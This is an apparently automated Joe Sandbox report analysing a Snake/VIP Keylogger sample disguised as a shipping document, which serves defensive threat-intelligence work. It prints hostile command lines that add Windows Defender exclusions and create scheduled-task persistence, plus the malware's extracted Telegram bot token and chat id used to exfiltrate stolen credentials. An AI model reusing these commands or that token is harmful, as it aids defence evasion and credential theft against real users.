Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipment advice H-BL Draft.exe

Overview

General Information

Sample name:Shipment advice H-BL Draft.exe
Analysis ID:1632061
MD5:83dbd3ae208a7ead15608402f92c0472
SHA1:cf2decf01276e50139778052a969044d4fc9d184
SHA256:2b4b87faf461d7fc3d1ca3344b9a5d0b52c98a63ef59ff5d53d9d9620cae98d4
Tags:exeuser-James_inthe_box
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Shipment advice H-BL Draft.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe" MD5: 83DBD3AE208A7EAD15608402F92C0472)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 8120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PrcGlGVKeUCXxg.exe (PID: 1340 cmdline: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe MD5: 83DBD3AE208A7EAD15608402F92C0472)
    • schtasks.exe (PID: 1208 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PrcGlGVKeUCXxg.exe (PID: 7888 cmdline: "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe" MD5: 83DBD3AE208A7EAD15608402F92C0472)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 27 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.Shipment advice H-BL Draft.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2ef1b:$s1: UnHook
            • 0x2ef22:$s2: SetHook
            • 0x2ef2a:$s3: CallNextHook
            • 0x2ef37:$s4: _hook
            14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.Shipment advice H-BL Draft.exe.498b840.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 44 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe, ParentImage: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe, ParentProcessId: 1340, ParentProcessName: PrcGlGVKeUCXxg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", ProcessId: 1208, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", ProcessId: 8120, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", ProcessId: 8120, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T19:02:40.073563+010028033053Unknown Traffic192.168.2.449718104.21.32.1443TCP
                    2025-03-07T19:02:43.664857+010028033053Unknown Traffic192.168.2.449726104.21.32.1443TCP
                    2025-03-07T19:02:44.721817+010028033053Unknown Traffic192.168.2.449727104.21.32.1443TCP
                    2025-03-07T19:02:56.715434+010028033053Unknown Traffic192.168.2.449739104.21.32.1443TCP
                    2025-03-07T19:02:58.950444+010028033053Unknown Traffic192.168.2.449741104.21.32.1443TCP
                    2025-03-07T19:03:02.772426+010028033053Unknown Traffic192.168.2.449745104.21.32.1443TCP
                    2025-03-07T19:03:06.352528+010028033053Unknown Traffic192.168.2.449747104.21.32.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T19:02:32.930833+010028032742Potentially Bad Traffic192.168.2.449716193.122.6.16880TCP
                    2025-03-07T19:02:36.618332+010028032742Potentially Bad Traffic192.168.2.449716193.122.6.16880TCP
                    2025-03-07T19:02:38.774582+010028032742Potentially Bad Traffic192.168.2.449719193.122.6.16880TCP
                    2025-03-07T19:02:40.883982+010028032742Potentially Bad Traffic192.168.2.449724193.122.6.16880TCP
                    2025-03-07T19:02:42.243262+010028032742Potentially Bad Traffic192.168.2.449719193.122.6.16880TCP
                    2025-03-07T19:02:45.493411+010028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-03-07T19:03:09.926380+010018100071Potentially Bad Traffic192.168.2.449751149.154.167.220443TCP
                    2025-03-07T19:03:16.787087+010018100071Potentially Bad Traffic192.168.2.449755149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Shipment advice H-BL Draft.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.joxcl
                    Found malware configuration
                    Source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
                    Source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeReversingLabs: Detection: 60%
                    Multi AV Scanner detection for submitted file
                    Source: Shipment advice H-BL Draft.exeVirustotal: Detection: 63%Perma Link
                    Source: Shipment advice H-BL Draft.exeReversingLabs: Detection: 60%
                    Joe Sandbox ML detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor: 6744331132
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor:
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor: 6744331132
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpackString decryptor:

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Shipment advice H-BL Draft.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49754 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: Shipment advice H-BL Draft.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 07CC2934h0_2_07CC2B38
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0280F45Dh13_2_0280F2C0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0280F45Dh13_2_0280F4AC
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0280FC19h13_2_0280F970
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 06693308h13_2_06692EF0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 06692D41h13_2_06692A90
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669D919h13_2_0669D670
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_06690673
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 06693308h13_2_06693236
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669D4C1h13_2_0669D218
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669DD71h13_2_0669DAC8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669E621h13_2_0669E378
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669E1C9h13_2_0669DF20
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 06690D0Dh13_2_06690B30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 066916F8h13_2_06690B30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669EA79h13_2_0669E7D0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_06690040
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_06690853
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669EED1h13_2_0669EC28
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669F781h13_2_0669F4D8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669F329h13_2_0669F080
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669FBD9h13_2_0669F930
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exeCode function: 4x nop then jmp 0669D069h13_2_0669CDC0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 07781B5Ch14_2_07781D60
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 0148F45Dh18_2_0148F2C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 0148F45Dh18_2_0148F4AC
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 0148FC19h18_2_0148F961
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C7EB5h18_2_056C7B78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C9280h18_2_056C8FB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CC82Fh18_2_056CC560
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CA83Fh18_2_056CA570
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C0FF1h18_2_056C0D48
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CE81Fh18_2_056CE550
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CECAFh18_2_056CE9E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C18A1h18_2_056C15F8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CCCBFh18_2_056CC9F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C1449h18_2_056C11A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C3709h18_2_056C3460
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C02E9h18_2_056C0040
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CBF0Fh18_2_056CBC40
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C9F1Fh18_2_056C9C50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C62D9h18_2_056C6030
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CDEFFh18_2_056CDC30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C32B1h18_2_056C3008
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CA3AFh18_2_056CA0E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C0B99h18_2_056C08F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CE38Fh18_2_056CE0C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CC39Fh18_2_056CC0D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C6733h18_2_056C6488
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C0741h18_2_056C0498
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C2A01h18_2_056C2758
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C55D1h18_2_056C5328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C79C9h18_2_056C7720
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CB5EFh18_2_056CB320
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C25A9h18_2_056C2300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CF5CFh18_2_056CF300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CD5DFh18_2_056CD310
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C9A8Fh18_2_056C97C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C5E81h18_2_056C5BD8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CDA6Fh18_2_056CD7A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C2E59h18_2_056C2BB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CBA7Fh18_2_056CB7B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C5A29h18_2_056C5780
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CFA5Fh18_2_056CF790
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C4D21h18_2_056C4A78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C7119h18_2_056C6E70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CF13Fh18_2_056CEE70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C1CF9h18_2_056C1A50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C48C9h18_2_056C4620
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CACCFh18_2_056CAA00
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C6CC1h18_2_056C6A18
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C7571h18_2_056C72C8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C5179h18_2_056C4ED0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056C2151h18_2_056C1EA8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CD14Fh18_2_056CCE80
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 4x nop then jmp 056CB15Fh18_2_056CAE90

                    Networking

                    barindex
